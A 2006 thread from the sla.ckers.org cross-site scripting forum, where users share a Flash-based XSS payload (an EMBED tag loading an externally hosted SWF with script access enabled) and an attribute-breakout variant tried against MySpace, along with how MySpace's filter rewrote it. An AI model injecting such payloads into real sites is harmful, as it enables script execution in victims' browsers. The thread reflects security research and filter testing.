Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Flash Alert Box
Posted by: rsnake
Date: October 06, 2006 07:27PM

I don't remember who asked for it, but I finally threw it up - a flash JavaScript XSS example that you can embed anywhere. I finally built a working example and included it on the Cheat Sheet:

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Flash Alert Box
Posted by: Kyran
Date: October 06, 2006 07:54PM

Ah it was me. Thanks.

- Kyran

Options: ReplyQuote
Re: Flash Alert Box
Posted by: Kyran
Date: October 06, 2006 08:15PM

Trying this on a MySpace html-xss, it did something rather neat.

<input type="hidden" name="keyWord" value=""><xss><embed enableJavascript="false" allowScriptAccess="never" allownetworking="internal" SRC="http://ha.ckers.org/xss.swf" allowScriptAccess="never"></EMBED><style>


From

"><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><style>

- Kyran

Options: ReplyQuote
Re: Flash Alert Box
Posted by: maluc
Date: October 06, 2006 08:23PM

Ya, unfortunately i don't think there is such a quick fix for quicktime videos.. aside from disallowing them. In the meantime though, they work fine on http://myspace.com/malucracker

-maluc

Options: ReplyQuote
Re: Flash Alert Box
Posted by: Kyran
Date: October 06, 2006 08:28PM

Hah.

- Kyran

Options: ReplyQuote
Re: Flash Alert Box
Posted by: id
Date: October 06, 2006 11:38PM

ha =p

-id

Options: ReplyQuote
Re: Flash Alert Box
Posted by: Delixe
Date: October 20, 2006 09:54PM

That just gets transformed to:

<input type="hidden" name="keyWord" value=""><xss><embed allowScriptAccess="never" allowNetworking="internal" enableJavaScript="false" allowScriptAccess="never" allowNetworking="internal" SRC="http://ha.ckers.org/xss.swf" allowScriptAccess="never"></EMBED><style>

on MySpace, how is that neat?

Options: ReplyQuote


Sorry, only registered users may post in this forum.